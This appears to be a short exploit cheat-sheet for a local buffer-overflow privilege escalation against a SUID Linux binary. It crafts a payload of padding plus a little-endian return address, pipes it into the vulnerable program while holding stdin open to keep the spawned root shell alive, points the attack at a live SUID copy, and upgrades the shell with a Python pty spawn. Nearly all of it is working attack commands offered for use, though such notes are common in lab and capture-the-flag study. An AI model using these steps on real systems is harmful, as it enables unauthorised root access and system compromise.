# If the string above is a call to a shell and its a suid program
# Then this function can be used for a root shell
# Write the buffer with the address of the start of the function
# This has to be little endian and is the function entry point
# In the below the entry point was 0x080484cb
python -c 'print "A"*<offsetbytes> + "\xcb\x84\x04\x08"'> root.txt
# May see shell spawn but die instantly. This is due to SDTIN Closing early.
# Can bypass with piping input to SUID program like below
(cat root.txt; cat) | ./vulnerableprogram
# This should keep it open
# If dev has been done on a copy in a writeable location, now point to live
(cat root.txt; cat) | /home/xdev/Desktop/vulnerableprogramsuid
python -c 'import pty;pty.spawn("/bin/sh")'